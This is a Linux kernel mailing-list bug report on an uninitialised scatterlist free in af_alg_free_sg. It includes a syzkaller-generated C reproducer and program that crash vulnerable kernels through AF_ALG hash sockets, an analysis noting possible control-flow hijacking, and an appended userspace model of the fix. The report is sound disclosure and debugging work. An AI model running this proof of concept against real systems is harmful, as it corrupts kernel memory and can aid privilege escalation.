From: xingwei lee
Date: Wed, 3 Jan 2024 11:05:24 +0800
Subject: Re: [PATCH] crypto: af_alg/hash: Fix uninit-value access in af_alg_free_sg()
To: syoshida@redhat.com
Cc: davem@davemloft.net, dhowells@redhat.com, herbert@gondor.apana.org.au, linux-crypto@vger.kernel.org, linux-kernel@vger.kernel.org

Hi, Shigeru and Herbert. Happy New Year anyway.

I also found this bug and tried to reproduce it. My own syzkaller crashes, titled "double-free in af_alg_free_sg" or "KASAN: use-after-free in af_alg_free_sg", led me to consider that it may be a security-related problem. I reproduced it with repro.c and repro.txt and also bisected it to this commit:
https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/crypto/algif_hash.c?id=b6d972f6898308fbe7e693bf8d44ebfdb1cd2dc4

=* repro.c =*

// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

uint64_t r[3] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff};

int main(void)
{
  syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  intptr_t res = 0;
  // AF_ALG (0x26) socket of type SOCK_SEQPACKET (5)
  res = syscall(__NR_socket, /*domain=*/0x26ul, /*type=*/5ul, /*proto=*/0);
  if (res != -1)
    r[0] = res;
  // struct sockaddr_alg: salg_family, salg_type = "hash", salg_feat, salg_mask, salg_name = "poly1305"
  *(uint16_t*)0x20000040 = 0x26;
  memcpy((void*)0x20000042, "hash\000\000\000\000\000\000\000\000\000\000", 14);
  *(uint32_t*)0x20000050 = 0;
  *(uint32_t*)0x20000054 = 0;
  memcpy((void*)0x20000058,
         "poly1305\000\000\000\000\000\000\000\000"
         "\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
         "\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
         "\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000",
         64);
  syscall(__NR_bind, /*fd=*/r[0], /*addr=*/0x20000040ul, /*addrlen=*/0x58ul);
  res = syscall(__NR_accept4, /*fd=*/r[0], /*peer=*/0ul, /*peerlen=*/0ul, /*flags=*/0ul);
  if (res != -1)
    r[1] = res;
  // struct msghdr with a single 0x14-byte iovec
  *(uint64_t*)0x20000d80 = 0;
  *(uint32_t*)0x20000d88 = 0;
  *(uint64_t*)0x20000d90 = 0x20000d40;
  *(uint64_t*)0x20000d40 = 0x20000d00;
  *(uint16_t*)0x20000d00 = 0;
  *(uint64_t*)0x20000d48 = 0x14;
  *(uint64_t*)0x20000d98 = 1;
  *(uint64_t*)0x20000da0 = 0;
  *(uint64_t*)0x20000da8 = 0;
  *(uint32_t*)0x20000db0 = 0;
  syscall(__NR_sendmsg, /*fd=*/r[1], /*msg=*/0x20000d80ul, /*f=*/0x400c000ul);
  res = syscall(__NR_accept4, /*fd=*/r[1], /*peer=*/0ul, /*peerlen=*/0ul, /*flags=*/0ul);
  if (res != -1)
    r[2] = res;
  // empty struct msghdr with msg_flags = 0x4000
  *(uint64_t*)0x20000840 = 0;
  *(uint32_t*)0x20000848 = 0;
  *(uint64_t*)0x20000850 = 0;
  *(uint64_t*)0x20000858 = 0;
  *(uint64_t*)0x20000860 = 0;
  *(uint64_t*)0x20000868 = 0;
  *(uint32_t*)0x20000870 = 0x4000;
  syscall(__NR_sendmsg, /*fd=*/r[2], /*msg=*/0x20000840ul, /*f=*/0x4001ul);
  return 0;
}

=* repro.txt =*

r0 = socket$alg(0x26, 0x5, 0x0)
bind$alg(r0, &(0x7f0000000040)={0x26, 'hash\x00', 0x0, 0x0, 'poly1305\x00'}, 0x58)
r1 = accept4(r0, 0x0, 0x0, 0x0)
sendmsg$BATADV_CMD_SET_HARDIF(r1, &(0x7f0000000d80)={0x0, 0x0, &(0x7f0000000d40)={&(0x7f0000000d00)=ANY=[@ANYBLOB, @ANYRES16=0x0, @ANYBLOB], 0x14}}, 0x400c000)
r2 = accept4(r1, 0x0, 0x0, 0x0)
sendmsg$alg(r2, &(0x7f0000000840)={0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x4000}, 0x4001)

After analysing the uninitialised ctx->sgl, it may cause the following (without KMSAN in the Linux kernel):

void af_alg_free_sg(struct af_alg_sgl *sgl)
{
    int i;

    if (sgl->sgt.sgl) {
        if (sgl->need_unpin)
            for (i = 0; i < sgl->sgt.nents; i++)
                unpin_user_page(sg_page(&sgl->sgt.sgl[i]));
        if (sgl->sgt.sgl != sgl->sgl)
            kvfree(sgl->sgt.sgl);
        sgl->sgt.sgl = NULL;
    }
}

1. If sgl->sgt.sgl is 0x0, the PoC triggers nothing.
2. If sgl->sgt.sgl is not NULL but something like 0xbbbbbbbbbbbbbbbb, unpin_user_page will crash with a "wild-memory access".
3. If sgl->sgt.sgl happens to be a pointer, whether it is in use or already released, with sgl->sgt.nents<0, kvfree can definitely cause a UAF or double free and may lead to control-flow hijacking.

The incorrect logic of the unlock_free label can really cause security issues.

I hope the reproducer and analysis help.

Best regards.
xingwei Lee
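The three outcomes listed in the mail depend entirely on what the never-written sgl field happens to contain when the cleanup runs. The userspace model below is an added example, not code from this thread or from the kernel: it mirrors the af_alg_free_sg() logic quoted above on stand-in types (model_sgl, model_sgt, model_sg, free_plan and the demo_* functions are all hypothetical names), computes as a dry run what that cleanup would do with a zeroed context versus one filled with a constructed 0xbb poison pattern, and shows that a context zeroed at allocation and NULLed after release turns the same cleanup path into a safe, idempotent operation.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MODEL_SG_INLINE 4u                 /* hypothetical inline capacity */

struct model_sg { uintptr_t page; };        /* stand-in for struct scatterlist */
struct model_sgt { struct model_sg *sgl; unsigned int nents; }; /* sg_table */
struct model_sgl {                          /* stand-in for struct af_alg_sgl */
    struct model_sgt sgt;
    struct model_sg sgl[MODEL_SG_INLINE];   /* inline entries, like sgl->sgl */
    int need_unpin;
};
struct free_plan {
    unsigned int would_unpin;               /* loop bound the unpin loop would use */
    void *would_kvfree;                     /* pointer kvfree() would get, or NULL */
};

/* Dry run of the af_alg_free_sg() logic quoted in the mail: report, don't act. */
static void model_plan_free_sg(const struct model_sgl *sgl, struct free_plan *p)
{
    p->would_unpin = 0;
    p->would_kvfree = NULL;
    if (!sgl->sgt.sgl)
        return;                             /* case 1: NULL, nothing happens */
    if (sgl->need_unpin)
        p->would_unpin = sgl->sgt.nents;    /* case 2: garbage count, wild reads */
    if ((uintptr_t)sgl->sgt.sgl != (uintptr_t)sgl->sgl)
        p->would_kvfree = sgl->sgt.sgl;     /* case 3: stale or garbage pointer */
}

/* The cleanup itself; returns how many entries it "unpinned". */
static unsigned int model_free_sg(struct model_sgl *sgl)
{
    struct free_plan p;
    model_plan_free_sg(sgl, &p);
    free(p.would_kvfree);                   /* free(NULL) is a no-op */
    sgl->sgt.sgl = NULL;                    /* a repeat call finds nothing to do */
    return p.would_unpin;
}

/* Attach n constructed entries: inline if they fit, else an out-of-line table.
 * Returns 0 (inline), 1 (out of line) or -1 on allocation failure. */
static int model_sg_attach(struct model_sgl *sgl, unsigned int n)
{
    struct model_sg *tbl = sgl->sgl;
    if (n > MODEL_SG_INLINE && !(tbl = calloc(n, sizeof *tbl)))
        return -1;
    for (unsigned int i = 0; i < n; i++)
        tbl[i].page = 0x1000u * (i + 1);    /* fake page references */
    sgl->sgt.sgl = tbl;
    sgl->sgt.nents = n;
    sgl->need_unpin = 1;
    return tbl != sgl->sgl;
}

/* Poison word standing in for never-written memory (constructed 0xbb bytes). */
static uintptr_t poison_word(void)
{
    uintptr_t w;
    memset(&w, 0xbb, sizeof w);
    return w;
}

/* Zeroed context: the cleanup plans and performs no work. */
static int demo_zeroed_ctx_cleanup_is_noop(void)
{
    struct model_sgl ctx;
    struct free_plan p;
    memset(&ctx, 0, sizeof ctx);
    model_plan_free_sg(&ctx, &p);
    return p.would_unpin == 0 && p.would_kvfree == NULL && model_free_sg(&ctx) == 0;
}

/* Context whose sgl was never initialised, modelled by a 0xbb fill. */
static struct free_plan demo_uninit_ctx_plan(void)
{
    struct model_sgl ctx;
    struct free_plan p;
    memset(&ctx, 0xbb, sizeof ctx);
    model_plan_free_sg(&ctx, &p);
    return p;
}

/* Zero-init, attach n, clean up twice. Returns 1 (inline) or 2 (out of line)
 * when cleanup unpinned n, NULLed the table and the repeat was a no-op; else 0. */
static int demo_init_attach_free(unsigned int n)
{
    struct model_sgl ctx;
    memset(&ctx, 0, sizeof ctx);
    int ool = model_sg_attach(&ctx, n);
    if (ool < 0 || model_free_sg(&ctx) != n || ctx.sgt.sgl || model_free_sg(&ctx))
        return 0;
    return 1 + ool;
}

int main(void)
{
    struct free_plan p = demo_uninit_ctx_plan();
    printf("zeroed ctx: no-op=%d\n", demo_zeroed_ctx_cleanup_is_noop());
    printf("uninit ctx: would kvfree %p, loop %u times\n", p.would_kvfree, p.would_unpin);
    printf("initialised: inline=%d out-of-line=%d\n",
           demo_init_attach_free(3), demo_init_attach_free(6));
    return 0;
}
```

The dry run is the part a reviewer can reason about without a sanitizer: with the zeroed context it reports no work, with the poisoned context it reports a 0xbbbbbbbb-iteration unpin loop and a kvfree() of the poison pointer, which is exactly the split between the mail's case 1 and cases 2 and 3. KMSAN flags the read of the uninitialised field itself; without it the outcome is decided by whatever the slab happened to hold.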